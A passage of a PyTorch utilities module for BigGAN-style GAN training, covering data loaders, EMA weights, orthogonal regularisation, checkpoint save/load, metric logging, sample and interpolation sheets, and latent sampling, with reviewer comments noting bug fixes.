        # How many whole epochs of indices are still needed.
        epochs_left = int(np.ceil((n * self.num_epochs - consumed) / float(n)))
        # Draw a permutation for *every* epoch, then keep only the trailing
        # epochs_left — so resuming at epoch k replays exactly epoch k's order.
        perms = [torch.randperm(n) for _ in range(self.num_epochs)]
        perms = perms[-epochs_left:]
        # Drop the already-consumed prefix of the first remaining epoch.
        perms[0] = perms[0][(consumed % n):]
        output = torch.cat(perms).tolist()
        print('Length dataset output is %d' % len(output))
        return iter(output)

    def __len__(self):
        return len(self.data_source) * self.num_epochs - self.start_itr * self.batch_size
# Convenience function to centralize all data loaders
def get_data_loaders(dataset, data_root=None, augment=False, batch_size=64,
                     num_workers=8, shuffle=True, load_in_mem=False, hdf5=False,
                     pin_memory=True, drop_last=True, start_itr=0,
                     num_epochs=500, use_multiepoch_sampler=False,
                     **kwargs):
    """Build the training DataLoader(s) for `dataset`.

    Args:
        dataset: shorthand key into the convenience dicts (e.g. 'I128_hdf5').
        data_root: base data directory; the dataset subpath is appended.
        augment: use random crop + horizontal flip instead of center crop.
        batch_size, num_workers, shuffle, pin_memory, drop_last: passed to
            the DataLoader.
        load_in_mem: preload the whole dataset into RAM.
        hdf5: NOTE(review): unused here — the HDF5 path is actually selected
            by the '_hdf5' suffix in `dataset`; confirm before removing.
        start_itr, num_epochs, use_multiepoch_sampler: configure the
            MultiEpochSampler (mutually exclusive with `shuffle`/`drop_last`).
        **kwargs: ignored extras (lets callers pass a whole config dict).

    Returns:
        list of DataLoader (currently just [train_loader]; the list exists
        for forward compatibility with validation/test splits).
    """
    # Append /FILENAME.hdf5 to root if using hdf5
    data_root += '/%s' % root_dict[dataset]
    print('Using dataset root location %s' % data_root)

    which_dataset = dset_dict[dataset]
    # Normalize to [-1, 1] (mean/std 0.5 per channel), as GANs expect.
    norm_mean = [0.5,0.5,0.5]
    norm_std = [0.5,0.5,0.5]
    image_size = imsize_dict[dataset]
    # For image folder datasets, name of the file where we store the precomputed
    # image locations to avoid having to walk the dirs every time we load.
    dataset_kwargs = {'index_filename': '%s_imgs.npz' % dataset}

    # HDF5 datasets have their own inbuilt transform, no need to train_transform
    if 'hdf5' in dataset:
        train_transform = None
    else:
        if augment:
            print('Data will be augmented...')
            if dataset in ['C10', 'C100']:
                train_transform = [transforms.RandomCrop(32, padding=4),
                                   transforms.RandomHorizontalFlip()]
            else:
                train_transform = [RandomCropLongEdge(),
                                   transforms.Resize(image_size),
                                   transforms.RandomHorizontalFlip()]
        else:
            print('Data will not be augmented...')
            if dataset in ['C10', 'C100']:
                train_transform = []
            else:
                train_transform = [CenterCropLongEdge(), transforms.Resize(image_size)]
            # train_transform = [transforms.Resize(image_size), transforms.CenterCrop]
        train_transform = transforms.Compose(train_transform + [
            transforms.ToTensor(),
            transforms.Normalize(norm_mean, norm_std)])
    train_set = which_dataset(root=data_root, transform=train_transform,
                              load_in_mem=load_in_mem, **dataset_kwargs)

    # Prepare loader; the loaders list is for forward compatibility with
    # using validation / test splits.
    loaders = []
    if use_multiepoch_sampler:
        print('Using multiepoch sampler from start_itr %d...' % start_itr)
        loader_kwargs = {'num_workers': num_workers, 'pin_memory': pin_memory}
        sampler = MultiEpochSampler(train_set, num_epochs, start_itr, batch_size)
        train_loader = DataLoader(train_set, batch_size=batch_size,
                                  sampler=sampler, **loader_kwargs)
    else:
        loader_kwargs = {'num_workers': num_workers, 'pin_memory': pin_memory,
                         'drop_last': drop_last} # Default, drop last incomplete batch
        train_loader = DataLoader(train_set, batch_size=batch_size,
                                  shuffle=shuffle, **loader_kwargs)
    loaders.append(train_loader)
    return loaders
# Utility file to seed rngs
def seed_rng(seed):
    """Seed the torch CPU, torch CUDA, and numpy RNGs with `seed`."""
    for seeder in (torch.manual_seed, torch.cuda.manual_seed, np.random.seed):
        seeder(seed)
# Utility to peg all roots to a base root
# If a base root folder is provided, peg all other root folders to it.
def update_config_roots(config):
    """If config['base_root'] is set, re-point every other *_root under it.

    Mutates and returns the same config dict.
    """
    base = config['base_root']
    if base:
        print('Pegging all root folders to base root %s' % base)
        for key in ['data', 'weights', 'logs', 'samples']:
            config['%s_root' % key] = '%s/%s' % (base, key)
    return config
# Utility to prepare root folders if they don't exist; parent folder must exist
def prepare_root(config):
    """Create the weights/logs/samples folders if missing.

    The parent folder must already exist (os.mkdir, not makedirs).
    """
    for key in ('weights_root', 'logs_root', 'samples_root'):
        path = config[key]
        if os.path.exists(path):
            continue
        print('Making directory %s for %s...' % (path, key))
        os.mkdir(path)
# Simple wrapper that applies EMA to a model. COuld be better done in 1.0 using
# the parameters() and buffers() module functions, but for now this works
# with state_dicts using .copy_
class ema(object):
    """Exponential moving average of a source model's parameters.

    At construction, `target`'s state is overwritten with a copy of
    `source`'s. Each `update()` then moves `target` toward `source`:
    target = target * decay + source * (1 - decay). Works through
    state_dicts (whose tensors are live references into the models), so
    the target model is updated in place.

    Args:
        source: model being trained.
        target: model holding the EMA copy.
        decay: EMA decay rate.
        start_itr: iteration at which decay kicks in; before that the
            target is pegged to the source (decay forced to 0).
    """
    def __init__(self, source, target, decay=0.9999, start_itr=0):
        self.source = source
        self.target = target
        self.decay = decay
        # Optional parameter indicating what iteration to start the decay at
        self.start_itr = start_itr
        # Initialize target's params to be source's
        self.source_dict = self.source.state_dict()
        self.target_dict = self.target.state_dict()
        print('Initializing EMA parameters to be source parameters...')
        with torch.no_grad():
            for key in self.source_dict:
                self.target_dict[key].data.copy_(self.source_dict[key].data)
                # target_dict[key].data = source_dict[key].data # Doesn't work!

    def update(self, itr=None):
        # If an iteration counter is provided and itr is less than the start itr,
        # peg the ema weights to the underlying weights.
        # Bug fix vs. original: test `itr is not None` instead of truthiness,
        # so that itr == 0 is also pegged when start_itr > 0.
        if itr is not None and itr < self.start_itr:
            decay = 0.0
        else:
            decay = self.decay
        with torch.no_grad():
            for key in self.source_dict:
                self.target_dict[key].data.copy_(self.target_dict[key].data * decay
                                                 + self.source_dict[key].data * (1 - decay))
# Apply modified ortho reg to a model
# This function is an optimized version that directly computes the gradient,
# instead of computing and then differentiating the loss.
def ortho(model, strength=1e-4, blacklist=[]):
    """Apply BigGAN's *modified* orthogonal regularization to `model`.

    Adds strength * 2 * (W W^T ⊙ (1 - I)) W directly to each eligible
    parameter's gradient (the off-diagonal-only variant), instead of
    computing a loss and differentiating it.

    Args:
        model: module whose parameter gradients are updated in place.
        strength: regularization coefficient.
        blacklist: parameters (matched by identity) to leave untouched.
    """
    with torch.no_grad():
        for param in model.parameters():
            # Skip 1-D params (biases, gains) and blacklisted tensors.
            if len(param.shape) < 2:
                continue
            if any(param is item for item in blacklist):
                continue
            w = param.view(param.shape[0], -1)
            off_diag = 1. - torch.eye(w.shape[0], device=w.device)
            reg_grad = 2 * torch.mm(torch.mm(w, w.t()) * off_diag, w)
            param.grad.data += strength * reg_grad.view(param.shape)
# Default ortho reg
# This function is an optimized version that directly computes the gradient,
# instead of computing and then differentiating the loss.
def default_ortho(model, strength=1e-4, blacklist=[]):
    """Apply *default* (unmodified) orthogonal regularization to `model`.

    Adds strength * 2 * (W W^T - I) W directly to each eligible parameter's
    gradient, instead of computing and then differentiating the loss.

    Args:
        model: module whose parameter gradients are updated in place.
        strength: regularization coefficient.
        blacklist: parameters (matched by identity) to leave untouched.
    """
    with torch.no_grad():
        for param in model.parameters():
            # Only apply this to parameters with at least 2 axes & not in blacklist.
            # Bug fix vs. original: use identity comparison like `ortho` above —
            # `param in blacklist` invokes Tensor.__eq__ and raises
            # "Boolean value of Tensor ... is ambiguous" for multi-element tensors.
            if len(param.shape) < 2 or any(param is item for item in blacklist):
                continue
            w = param.view(param.shape[0], -1)
            grad = (2 * torch.mm(torch.mm(w, w.t())
                                 - torch.eye(w.shape[0], device=w.device), w))
            param.grad.data += strength * grad.view(param.shape)
# Convenience utility to switch off requires_grad
def toggle_grad(model, on_or_off):
    """Set requires_grad to `on_or_off` (bool) on every parameter of `model`."""
    for p in model.parameters():
        p.requires_grad = on_or_off
# Function to join strings or ignore them
# Base string is the string to link "strings," while strings
# is a list of strings or Nones.
def join_strings(base_string, strings):
    """Join the truthy entries of `strings` with `base_string`.

    Nones and empty strings are silently dropped, so optional name
    suffixes can be passed straight through.
    """
    kept = [s for s in strings if s]
    return base_string.join(kept)
# Save a model's weights, optimizer, and the state_dict
def save_weights(G, D, state_dict, weights_root, experiment_name,
                 name_suffix=None, G_ema=None):
    """Save G/D weights and optimizer states, the training state_dict, and
    (optionally) the EMA copy of G under weights_root/experiment_name.

    Files are named '<tag>[_<name_suffix>].pth'.
    """
    root = '/'.join([weights_root, experiment_name])
    if not os.path.exists(root):
        os.mkdir(root)
    if name_suffix:
        print('Saving weights to %s/%s...' % (root, name_suffix))
    else:
        print('Saving weights to %s...' % root)

    def _save(obj, tag):
        # Same naming scheme as the original explicit calls.
        torch.save(obj, '%s/%s.pth' % (root, join_strings('_', [tag, name_suffix])))

    _save(G.state_dict(), 'G')
    _save(G.optim.state_dict(), 'G_optim')
    _save(D.state_dict(), 'D')
    _save(D.optim.state_dict(), 'D_optim')
    _save(state_dict, 'state_dict')
    if G_ema is not None:
        _save(G_ema.state_dict(), 'G_ema')
def load_state_dict(model, state_dict, strict=True):
    """Load `state_dict` into `model`, reporting key mismatches both ways.

    Delegates the actual load to model.load_state_dict(strict=strict);
    afterwards prints which model keys were absent from the provided dict
    and which provided keys the model doesn't have.
    """
    provided_keys = list(state_dict.keys())
    model_keys = list(model.state_dict().keys())
    not_provided = [k for k in model_keys if k not in provided_keys]
    not_in_model = [k for k in provided_keys if k not in model_keys]
    model.load_state_dict(state_dict, strict=strict)
    if not_provided:
        print("No param in provided state dict: {}".format(str(not_provided)))
    if not_in_model:
        print("No param in the model: {}".format(str(not_in_model)))
# Load a model's weights, optimizer, and the state_dict
def load_weights(G, D, state_dict, weights_root, experiment_name,
                 name_suffix=None, G_ema=None, strict=True, load_optim=True):
    """Load model/optimizer weights and the training state (mirror of
    save_weights).

    Args:
        G, D: generator/discriminator to load into (either may be None).
        state_dict: training-state dict updated *in place*, key by key.
        weights_root, experiment_name: checkpoint directory components.
        name_suffix: optional checkpoint tag (e.g. 'best0', 'copy0').
        G_ema: optional EMA generator to load as well.
        strict: passed to load_state_dict.
        load_optim: also restore G.optim / D.optim states.
    """
    root = '/'.join([weights_root, experiment_name])
    if name_suffix:
        print('Loading %s weights from %s...' % (name_suffix, root))
    else:
        print('Loading weights from %s...' % root)
    if G is not None:
        G.load_state_dict(
            torch.load('%s/%s.pth' % (root, join_strings('_', ['G', name_suffix]))),
            strict=strict)
        if load_optim:
            G.optim.load_state_dict(
                torch.load('%s/%s.pth' % (root, join_strings('_', ['G_optim', name_suffix]))))
    if D is not None:
        D.load_state_dict(
            torch.load('%s/%s.pth' % (root, join_strings('_', ['D', name_suffix]))),
            strict=strict)
        if load_optim:
            D.optim.load_state_dict(
                torch.load('%s/%s.pth' % (root, join_strings('_', ['D_optim', name_suffix]))))
    # Load the training state in place. Perf fix vs. original: read the
    # checkpoint file once instead of re-loading it for every single key.
    # (Guarded so an empty state_dict still skips the file, as before.)
    if state_dict:
        saved_state = torch.load(
            '%s/%s.pth' % (root, join_strings('_', ['state_dict', name_suffix])))
        for item in state_dict:
            state_dict[item] = saved_state[item]
    if G_ema is not None:
        G_ema.load_state_dict(
            torch.load('%s/%s.pth' % (root, join_strings('_', ['G_ema', name_suffix]))),
            strict=strict)
''' MetricsLogger originally stolen from VoxNet source code.
Used for logging inception metrics'''
class MetricsLogger(object):
    """Append-only JSON-lines logger (one dict per line).

    Used for logging inception metrics. If `reinitialize` is set and the
    file already exists, it is deleted on construction.
    """

    def __init__(self, fname, reinitialize=False):
        self.fname = fname
        self.reinitialize = reinitialize
        if os.path.exists(self.fname) and self.reinitialize:
            print('{} exists, deleting...'.format(self.fname))
            os.remove(self.fname)

    def log(self, record=None, **kwargs):
        """
        Assumption: no newlines in the input.
        """
        # Keyword args are merged into the record (mutating it, as before),
        # and a '_stamp' wall-clock timestamp is added.
        if record is None:
            record = {}
        record.update(kwargs)
        record['_stamp'] = time.time()
        line = json.dumps(record, ensure_ascii=True)
        with open(self.fname, 'a') as f:
            f.write(line + '\n')
# Logstyle is either:
# '%#.#f' for floating point representation in text
# '%#.#e' for exponent representation in text
# 'npz' for output to npz # NOT YET SUPPORTED
# 'pickle' for output to a python pickle # NOT YET SUPPORTED
# 'mat' for output to a MATLAB .mat file # NOT YET SUPPORTED
class MyLogger(object):
    """Plain-text per-metric logger: each metric gets its own
    '<root>/<metric>.log' file containing lines '<itr>: <value>'.

    Logstyle is either:
      '%#.#f' for floating point representation in text
      '%#.#e' for exponent representation in text
      'npz' for output to npz # NOT YET SUPPORTED
      'pickle' for output to a python pickle # NOT YET SUPPORTED
      'mat' for output to a MATLAB .mat file # NOT YET SUPPORTED
    """
    def __init__(self, fname, reinitialize=False, logstyle='%3.3f'):
        self.root = fname
        if not os.path.exists(self.root):
            os.mkdir(self.root)
        self.reinitialize = reinitialize
        self.metrics = []  # metric names seen so far (one log file each)
        self.logstyle = logstyle  # One of '%3.3f' or like '%3.3e'

    def reinit(self, item):
        """Delete log for metric `item` if re-starting and it already exists."""
        log_path = '%s/%s.log' % (self.root, item)
        if os.path.exists(log_path) and self.reinitialize:
            # Only print the removal message once for the (many) sv logs.
            # Bug fix vs. original: the generator variable no longer shadows
            # `item`.
            if 'sv' in item:
                if not any('sv' in metric for metric in self.metrics):
                    print('Deleting singular value logs...')
            else:
                # Bug fix vs. original: print the path actually removed
                # ('%s/%s.log'), not the bogus '%s_%s.log' variant.
                print('{} exists, deleting...'.format(log_path))
            os.remove(log_path)

    # Log in plaintext; this is designed for being read in MATLAB(sorry not sorry)
    def log(self, itr, **kwargs):
        for arg in kwargs:
            if arg not in self.metrics:
                if self.reinitialize:
                    self.reinit(arg)
                self.metrics += [arg]
            if self.logstyle == 'pickle':
                print('Pickle not currently supported...')
            elif self.logstyle == 'mat':
                print('.mat logstyle not currently supported...')
            else:
                with open('%s/%s.log' % (self.root, arg), 'a') as f:
                    f.write('%d: %s\n' % (itr, self.logstyle % kwargs[arg]))
# Write some metadata to the logs directory
def write_metadata(logs_root, experiment_name, config, state_dict):
    """Dump the current time, config, and training state to
    '<logs_root>/<experiment_name>/metalog.txt' (overwriting any previous
    file). The experiment directory must already exist.
    """
    meta_path = '%s/%s/metalog.txt' % (logs_root, experiment_name)
    with open(meta_path, 'w') as writefile:
        writefile.write('datetime: %s\n' % str(datetime.datetime.now()))
        writefile.write('config: %s\n' % str(config))
        writefile.write('state: %s\n' % str(state_dict))
"""
Very basic progress indicator to wrap an iterable in.
Author: Jan Schlüter
Andy's adds: time elapsed in addition to ETA, makes it possible to add
estimated time to 1k iters instead of estimated time to completion.
"""
def progress(items, desc='', total=None, min_delay=0.1, displaytype='s1k'):
    """
    Returns a generator over `items`, printing the number and percentage of
    items processed and the estimated remaining processing time before yielding
    the next item. `total` gives the total number of items (required if `items`
    has no length), and `min_delay` gives the minimum time in seconds between
    subsequent prints. `desc` gives an optional prefix text (end with a space).
    `displaytype` 's1k' shows estimated time to the next 1000 iterations;
    anything else shows estimated time to completion.
    """
    total = total or len(items)
    t_start = time.time()
    t_last = 0
    for n, item in enumerate(items):
        t_now = time.time()
        # Throttle console output to at most one line per min_delay seconds.
        if t_now - t_last > min_delay:
            print("\r%s%d/%d (%6.2f%%)" % (
                desc, n + 1, total, n / float(total) * 100), end=" ")
            if n > 0:
                t_done = t_now - t_start
                if displaytype == 's1k':  # minutes/seconds for 1000 iters
                    next_1000 = n + (1000 - n % 1000)
                    t_1k = t_done / n * next_1000
                    done_m, done_s = divmod(t_done, 60)
                    rem_m, rem_s = divmod(t_1k - t_done, 60)
                    print("(TE/ET1k: %d:%02d / %d:%02d)" % (done_m, done_s, rem_m, rem_s), end=" ")
                else:  # displaytype == 'eta'
                    t_total = t_done / n * total
                    done_m, done_s = divmod(t_done, 60)
                    rem_m, rem_s = divmod(t_total - t_done, 60)
                    print("(TE/ETA: %d:%02d / %d:%02d)" % (done_m, done_s, rem_m, rem_s), end=" ")
            sys.stdout.flush()
            t_last = t_now
        yield item
    t_total = time.time() - t_start
    print("\r%s%d/%d (100.00%%) (took %d:%02d)" % ((desc, total, total) +
                                                   divmod(t_total, 60)))
# Sample function for use with inception metrics
def sample(G, z_, y_, config):
  """Resample z_ and y_ in place, then return (G(z, G.shared(y)), y_)."""
  with torch.no_grad():
    z_.sample_()
    y_.sample_()
    shared_y = G.shared(y_)
    if not config['parallel']:
      images = G(z_, shared_y)
    else:
      images = nn.parallel.data_parallel(G, (z_, shared_y))
  return images, y_
# Sample function for sample sheets
def sample_sheet(G, classes_per_sheet, num_classes, samples_per_class, parallel,
                 samples_root, experiment_name, folder_number, z_=None):
  """Save grids of class-conditional samples as JPEGs.

  Produces num_classes // classes_per_sheet images under
  samples_root/experiment_name/folder_number/, each a grid with one row per
  class (classes_per_sheet rows) and samples_per_class columns.
  If z_ is None (or too small), fresh latents are drawn per column.
  NOTE(review): assumes a CUDA device is available (y and fallback z are
  created on 'cuda') -- confirm before running on CPU-only hosts.
  """
  # Prepare sample directory
  if not os.path.isdir('%s/%s' % (samples_root, experiment_name)):
    os.mkdir('%s/%s' % (samples_root, experiment_name))
  if not os.path.isdir('%s/%s/%d' % (samples_root, experiment_name, folder_number)):
    os.mkdir('%s/%s/%d' % (samples_root, experiment_name, folder_number))
  # loop over total number of sheets
  for i in range(num_classes // classes_per_sheet):
    ims = []
    # One class label per row of the sheet.
    y = torch.arange(i * classes_per_sheet, (i + 1) * classes_per_sheet, device='cuda')
    for j in range(samples_per_class):
      # Reuse the provided latent distribution if it can cover a full sheet;
      # otherwise draw a plain standard-normal batch.
      if (z_ is not None) and hasattr(z_, 'sample_') and classes_per_sheet <= z_.size(0):
        z_.sample_()
      else:
        z_ = torch.randn(classes_per_sheet, G.dim_z, device='cuda')
      with torch.no_grad():
        if parallel:
          o = nn.parallel.data_parallel(G, (z_[:classes_per_sheet], G.shared(y)))
        else:
          o = G(z_[:classes_per_sheet], G.shared(y))
      ims += [o.data.cpu()]
    # This line should properly unroll the images
    out_ims = torch.stack(ims, 1).view(-1, ims[0].shape[1], ims[0].shape[2],
                                       ims[0].shape[3]).data.float().cpu()
    # The path for the samples
    image_filename = '%s/%s/%d/samples%d.jpg' % (samples_root, experiment_name,
                                                 folder_number, i)
    torchvision.utils.save_image(out_ims, image_filename,
                                 nrow=samples_per_class, normalize=True)
# Interp function; expects x0 and x1 to be of shape (shape0, 1, rest_of_shape..)
def interp(x0, x1, num_midpoints):
  """Linearly interpolate between x0 and x1.

  Args:
    x0, x1: tensors of shape [bs, 1, d] (endpoints of each interpolation row).
    num_midpoints: number of interior points; output has num_midpoints + 2
      steps along dim 1 (endpoints included).
  Returns:
    Tensor of shape [bs, num_midpoints + 2, d].
  """
  # BUG FIX: the interpolation weights were created with device='cuda'
  # unconditionally, which broke CPU (and non-default-device) inputs.
  # Follow x0's device/dtype instead -- identical behavior for CUDA callers.
  lerp = torch.linspace(0, 1.0, num_midpoints + 2, device=x0.device).to(x0.dtype)
  return ((x0 * (1 - lerp.view(1, -1, 1))) + (x1 * lerp.view(1, -1, 1)))
# interp sheet function
# Supports full, class-wise and intra-class interpolation
def interp_sheet(G, num_per_sheet, num_midpoints, num_classes, parallel,
                 samples_root, experiment_name, folder_number, sheet_number=0,
                 fix_z=False, fix_y=False, device='cuda'):
  """Save one JPEG grid of interpolations between random samples.

  Each of the num_per_sheet rows interpolates over num_midpoints + 2 columns.
  fix_z holds the latent constant per row (class-only interpolation);
  fix_y holds the class embedding constant per row (latent-only); with both
  False, z and the class embedding are interpolated jointly.
  """
  # Prepare zs and ys
  if fix_z: # If fix Z, only sample 1 z per row
    zs = torch.randn(num_per_sheet, 1, G.dim_z, device=device)
    zs = zs.repeat(1, num_midpoints + 2, 1).view(-1, G.dim_z)
  else:
    zs = interp(torch.randn(num_per_sheet, 1, G.dim_z, device=device),
                torch.randn(num_per_sheet, 1, G.dim_z, device=device),
                num_midpoints).view(-1, G.dim_z)
  if fix_y: # If fix y, only sample 1 z per row
    ys = sample_1hot(num_per_sheet, num_classes)
    ys = G.shared(ys).view(num_per_sheet, 1, -1)
    ys = ys.repeat(1, num_midpoints + 2, 1).view(num_per_sheet * (num_midpoints + 2), -1)
  else:
    # Interpolation happens in the shared-embedding space, not label space.
    ys = interp(G.shared(sample_1hot(num_per_sheet, num_classes)).view(num_per_sheet, 1, -1),
                G.shared(sample_1hot(num_per_sheet, num_classes)).view(num_per_sheet, 1, -1),
                num_midpoints).view(num_per_sheet * (num_midpoints + 2), -1)
  # Run the net--note that we've already passed y through G.shared.
  if G.fp16:
    zs = zs.half()
  with torch.no_grad():
    if parallel:
      out_ims = nn.parallel.data_parallel(G, (zs, ys)).data.cpu()
    else:
      out_ims = G(zs, ys).data.cpu()
  # Filename encodes which quantities were interpolated (Z, Y, or both).
  interp_style = '' + ('Z' if not fix_z else '') + ('Y' if not fix_y else '')
  image_filename = '%s/%s/%d/interp%s%d.jpg' % (samples_root, experiment_name,
                                                folder_number, interp_style,
                                                sheet_number)
  torchvision.utils.save_image(out_ims, image_filename,
                               nrow=num_midpoints + 2, normalize=True)
# Convenience debugging function to print out gradnorms and shape from each layer
# May need to rewrite this so we can actually see which parameter is which
def print_grad_norms(net):
  """Print [grad-norm, weight-norm, shape] for each parameter, sorted by grad norm."""
  stats = []
  for param in net.parameters():
    stats.append([float(torch.norm(param.grad).item()),
                  float(torch.norm(param).item()),
                  param.shape])
  ranking = np.argsort([entry[0] for entry in stats])
  print(['%3.3e,%3.3e, %s' % (stats[i][0],
                              stats[i][1],
                              str(stats[i][2]))
         for i in ranking])
# Get singular values to log. This will use the state dict to find them
# and substitute underscores for dots.
def get_SVs(net, prefix):
  """Return {prefix_key: float} for every state-dict entry whose name contains 'sv'."""
  state = net.state_dict()
  out = {}
  for key in state:
    if 'sv' not in key:
      continue
    flat_key = ('%s_%s' % (prefix, key)).replace('.', '_')
    out[flat_key] = float(state[key].item())
  return out
# Name an experiment based on its config
def name_from_config(config):
  """Build a human-readable experiment name from the config dict.

  Each hyperparameter that differs from its default contributes one token;
  entries equal to their default evaluate to None and are filtered out of
  the join. If config['hashname'] is set, the long name is compressed into
  a short "animal hash" instead.
  """
  name = '_'.join([
    item for item in [
    'Big%s' % config['which_train_fn'],
    config['dataset'],
    config['model'] if config['model'] != 'BigGAN' else None,
    'seed%d' % config['seed'],
    'Gch%d' % config['G_ch'],
    'Dch%d' % config['D_ch'],
    'Gd%d' % config['G_depth'] if config['G_depth'] > 1 else None,
    'Dd%d' % config['D_depth'] if config['D_depth'] > 1 else None,
    'bs%d' % config['batch_size'],
    'Gfp16' if config['G_fp16'] else None,
    'Dfp16' if config['D_fp16'] else None,
    'nDs%d' % config['num_D_steps'] if config['num_D_steps'] > 1 else None,
    'nDa%d' % config['num_D_accumulations'] if config['num_D_accumulations'] > 1 else None,
    'nGa%d' % config['num_G_accumulations'] if config['num_G_accumulations'] > 1 else None,
    'Glr%2.1e' % config['G_lr'],
    'Dlr%2.1e' % config['D_lr'],
    # Adam beta1/beta2 tokens only appear when they differ from (0.0, 0.999).
    'GB%3.3f' % config['G_B1'] if config['G_B1'] !=0.0 else None,
    'GBB%3.3f' % config['G_B2'] if config['G_B2'] !=0.999 else None,
    'DB%3.3f' % config['D_B1'] if config['D_B1'] !=0.0 else None,
    'DBB%3.3f' % config['D_B2'] if config['D_B2'] !=0.999 else None,
    'Gnl%s' % config['G_nl'],
    'Dnl%s' % config['D_nl'],
    'Ginit%s' % config['G_init'],
    'Dinit%s' % config['D_init'],
    'G%s' % config['G_param'] if config['G_param'] != 'SN' else None,
    'D%s' % config['D_param'] if config['D_param'] != 'SN' else None,
    'Gattn%s' % config['G_attn'] if config['G_attn'] != '0' else None,
    'Dattn%s' % config['D_attn'] if config['D_attn'] != '0' else None,
    'Gortho%2.1e' % config['G_ortho'] if config['G_ortho'] > 0.0 else None,
    'Dortho%2.1e' % config['D_ortho'] if config['D_ortho'] > 0.0 else None,
    config['norm_style'] if config['norm_style'] != 'bn' else None,
    'cr' if config['cross_replica'] else None,
    'Gshared' if config['G_shared'] else None,
    'hier' if config['hier'] else None,
    'ema' if config['ema'] else None,
    config['name_suffix'] if config['name_suffix'] else None,
    ]
    if item is not None])
  # dogball
  if config['hashname']:
    return hashname(name)
  else:
    return name
# A simple function to produce a unique experiment name from the animal hashes.
def hashname(name):
  """Deterministically map `name` to a short three-part "animal hash" string.

  Treats hash(name) as a mixed-radix number with digits drawn from the
  animal_hash.a / .b / .c word lists and concatenates one word per digit.
  """
  h = hash(name)
  a = h % len(animal_hash.a)
  h = h // len(animal_hash.a)
  b = h % len(animal_hash.b)
  # BUG FIX: this previously divided by len(animal_hash.c), which uses the
  # wrong radix for the second digit and skews the third component whenever
  # the b and c lists differ in length.
  h = h // len(animal_hash.b)
  c = h % len(animal_hash.c)
  return animal_hash.a[a] + animal_hash.b[b] + animal_hash.c[c]
# Get GPU memory, -i is the index
def query_gpu(indices):
  """Print free GPU memory (via nvidia-smi) for the requested device indices.

  Args:
    indices: a single index, an iterable of indices, or None for all GPUs.
  """
  # BUG FIX: the index was previously hard-coded to 0, silently ignoring
  # the `indices` argument.
  if indices is None:
    selector = ''
  elif isinstance(indices, (list, tuple, set)):
    selector = '-i %s ' % ','.join(str(i) for i in indices)
  else:
    selector = '-i %s ' % indices
  os.system('nvidia-smi %s--query-gpu=memory.free --format=csv' % selector)
# Convenience function to count the number of parameters in a module
def count_parameters(module):
  """Print the total number of elements across all parameters of `module`."""
  total = sum(p.data.nelement() for p in module.parameters())
  print('Number of parameters: {}'.format(total))
# Convenience function to sample an index, not actually a 1-hot
def sample_1hot(batch_size, num_classes, device='cuda'):
  """Sample `batch_size` class indices uniformly from [0, num_classes)."""
  labels = torch.randint(0, num_classes, (batch_size,), device=device,
                         dtype=torch.int64, requires_grad=False)
  return labels
# A highly simplified convenience class for sampling from distributions
# One could also use PyTorch's inbuilt distributions package.
# Note that this class requires initialization to proceed as
# x = Distribution(torch.randn(size))
# x.init_distribution(dist_type, **dist_kwargs)
# x = x.to(device,dtype)
# This is partially based on https://discuss.pytorch.org/t/subclassing-torch-tensor/23754/2
class Distribution(torch.Tensor):
  """A torch.Tensor that can re-fill itself in place from a distribution.

  Supports 'normal' (mean/var) and 'categorical' (num_categories) modes;
  the categorical mode can optionally enumerate a fixed set of categories
  with a fixed number of samples each instead of sampling uniformly.
  """
  # Init the params of the distribution
  def init_distribution(self, dist_type, **kwargs):
    # dist_type: 'normal' or 'categorical'; dist_kwargs kept so to() can
    # re-initialize the wrapped copy with identical parameters.
    self.dist_type = dist_type
    self.dist_kwargs = kwargs
    if self.dist_type == 'normal':
      self.mean, self.var = kwargs['mean'], kwargs['var']
    elif self.dist_type == 'categorical':
      self.num_categories = kwargs['num_categories']
      # if given the number of category ids, and each number of sampls for each categroy,
      # the conditional y will be generated in the given manner
      if 'num_categories_to_sample' in kwargs and 'per_category_to_sample' in kwargs:
        if kwargs['num_categories_to_sample'] is not None and kwargs['per_category_to_sample'] is not None:
          self.num_categories_to_sample = kwargs['num_categories_to_sample']
          self.per_category_to_sample = kwargs['per_category_to_sample']
          # <= 0 means "enumerate every category"; otherwise pick a random
          # subset of num_categories_to_sample category ids.
          if self.num_categories_to_sample <= 0:
            self.categories_to_sample = list(range(self.num_categories))
          else:
            categories = list(range(self.num_categories))
            np.random.shuffle(categories)
            self.categories_to_sample = categories[:self.num_categories_to_sample]
          # count/total_count/next track progress through the enumeration.
          self.count = 0
          self.total_count = len(self.categories_to_sample) * self.per_category_to_sample
          self.next = True
  def sample_(self):
    """Re-fill this tensor in place from the configured distribution."""
    if self.dist_type == 'normal':
      self.normal_(self.mean, self.var)
    elif self.dist_type == 'categorical':
      if hasattr(self, 'categories_to_sample') and hasattr(self, 'per_category_to_sample'):
        # Deterministic enumeration mode: emit per_category_to_sample copies
        # of each chosen category id, batch by batch, advancing self.count.
        batch_size = self.shape[0]
        count_cur = self.count + batch_size
        cate_idx_pre = self.count // self.per_category_to_sample
        cate_idx_cur = count_cur // self.per_category_to_sample
        cate_id = self.categories_to_sample[cate_idx_pre:cate_idx_cur+1]
        cate_id = torch.tensor(cate_id).unsqueeze(dim=1).repeat(1, self.per_category_to_sample).view(-1)
        start_idx = self.count - self.per_category_to_sample * max(0, cate_idx_pre)
        end_idx = start_idx + batch_size
        # Duplicate the id list when a batch straddles the end of the slice so
        # the indexing below always has enough elements.
        if end_idx > cate_id.shape[0]:
          cate_id = torch.cat((cate_id, cate_id), dim=0)
        self.copy_(cate_id[start_idx:end_idx])
        self.count = count_cur
        # self.next flags whether any un-emitted (category, sample) pairs remain.
        self.next = self.count < self.total_count
      else: # generate the category label randomly
        self.random_(0, self.num_categories)
    # return self.variable
  # Silly hack: overwrite the to() method to wrap the new object
  # in a distribution as well
  def to(self, *args, **kwargs):
    new_obj = Distribution(self)
    new_obj.init_distribution(self.dist_type, **self.dist_kwargs)
    new_obj.data = super().to(*args, **kwargs)
    return new_obj
# Convenience function to prepare a z and y vector
def prepare_z_y(G_batch_size, dim_z, nclasses, device='cuda',
                fp16=False,z_var=1.0, per_category_to_sample=None,
                num_categories_to_sample=None):
  """Build resample-able latent (z_) and label (y_) Distribution tensors."""
  z_ = Distribution(torch.randn(G_batch_size, dim_z, requires_grad=False))
  z_.init_distribution('normal', mean=0, var=z_var)
  dtype = torch.float16 if fp16 else torch.float32
  z_ = z_.to(device, dtype)
  if fp16:
    z_ = z_.half()
  y_ = Distribution(torch.zeros(G_batch_size, requires_grad=False))
  y_.init_distribution('categorical', num_categories=nclasses,
